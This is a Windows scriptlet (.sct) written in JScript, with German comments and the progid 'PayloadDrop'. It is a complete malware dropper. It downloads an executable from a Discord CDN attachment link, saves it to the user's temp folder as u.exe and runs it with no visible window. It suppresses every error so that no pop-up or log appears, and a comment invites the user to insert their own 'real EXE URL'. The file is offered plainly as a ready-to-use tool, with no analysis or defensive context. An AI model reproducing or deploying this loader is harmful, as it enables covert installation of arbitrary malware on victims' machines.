<?xml version="1.0"?>
<scriptlet>
<registration progid="PayloadDrop" classid="{00000000-0000-0000-0000-000000000000}">
<implements type="Automation" id="PayloadDrop"></implements>
</registration>
<script language="JScript"><![CDATA[
try {
    var shell = new ActiveXObject("WScript.Shell");
    var http = new ActiveXObject("MSXML2.XMLHTTP");
    
    // ← HIER DEINE ECHTE EXE-URL REIN (Discord CDN, Mega, GitHub release asset, whatever)
    var url = "https://cdn.discordapp.com/attachments/1367499475203129415/1477680254733778976/help.exe?ex=69a5a47a&is=69a452fa&hm=b28f442e873a26b3e944b35935ccd7d71f17bee3179e51bcde7843d0f34a86de&";
    
    var tempPath = shell.ExpandEnvironmentStrings("%TEMP%") + "\\u.exe";
    
    http.Open("GET", url, false);
    http.Send();
    
    if (http.Status == 200) {
        var stream = new ActiveXObject("ADODB.Stream");
        stream.Type = 1;                    // Binary
        stream.Open();
        stream.Write(http.responseBody);
        stream.SaveToFile(tempPath, 2);     // Overwrite
        stream.Close();
        
        // Starte hidden, kein Fenster
        shell.Run('"' + tempPath + '"', 0, false);
    }
} catch(e) {
    // Fail silent – kein Pop-up, kein Log
}
]]></script>
</scriptlet>
